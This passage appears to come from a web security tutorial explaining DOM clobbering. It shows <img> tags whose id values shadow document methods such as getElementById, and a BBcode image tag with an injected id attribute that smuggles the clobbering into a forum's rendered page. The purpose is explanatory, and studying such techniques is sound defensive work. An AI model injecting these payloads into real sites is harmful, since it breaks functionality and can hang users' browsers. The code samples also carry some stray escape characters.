We can therefore cause the JavaScript references to return an empty object using the following technique:
<img id="getElementById">
<img id="querySelector">
<img id="getElementByTagName">
assuming an application uses a BBcode tag to publish image:
[img width="100" height="50"]<https://www.bbcode.org/images/lubeck_small\\.jpg\\[/img]>
Which is interpreted in the browser as follows:
<img width="100" height="50" src=”https://www.bbcode.org/images/lubeck_\\small.jpg”>
We can take advantage of DOM clobbering like this:
[img width="100" id=”getElementById” height="50"]<https://www.bbcode.org>\\/images/lubeck_small.jpg\\[/img]
We have now effectively clobbered the DOM in the web application, which may
result in the breakdown of functionality and in some cases cause the browser to
become unresponsive